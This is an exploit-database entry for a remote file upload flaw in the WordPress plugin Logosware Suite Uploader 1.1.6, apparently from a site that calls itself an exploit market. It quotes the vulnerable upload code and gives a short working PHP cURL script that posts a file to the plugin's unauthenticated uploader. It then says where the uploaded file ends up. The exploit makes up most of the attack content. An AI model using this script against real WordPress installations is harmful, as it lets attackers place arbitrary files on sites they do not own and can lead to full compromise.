[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Logosware Suite Uploader 1.1.6 Plugin Remote File Upload Vulnerability

Author
Shahab Shamsi
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-28211
Category
web applications
Date add
31-07-2017
Platform
php
[-] Title : WordPress Plugin Logosware Suite Uploader 1.1.6 - Remote File Upload
[-] Author : Shahab Shamsi
[-] Vendor : https://wordpress.org/plugins/logosware-suite-uploader/
[-] Category : Webapps
[-] Date : 30.July.2017


Vulnerable Source:
176: if(is_uploaded_file($_FILES['zip']['tmp_name']))
207: move_uploaded_file move_uploaded_file($_FILES['zip']['tmp_name'], $tempZipPath))
206: $tempZipPath = $temporaryPath . $tempZipName;
190: $temporaryPath = $this->tempDir . $temporaryDir . "/";
189: $temporaryDir = date("YmdHis");
204: $tempZipName = "zipfile" . date("His") . ".zip";



Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/logosware-suite-uploader/lw-suite-uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>


Location File:
http://localhost/wordpress/wp-content/plugins/logosware-suite-uploader/file.jpg

#  0day.today [2024-12-25]  #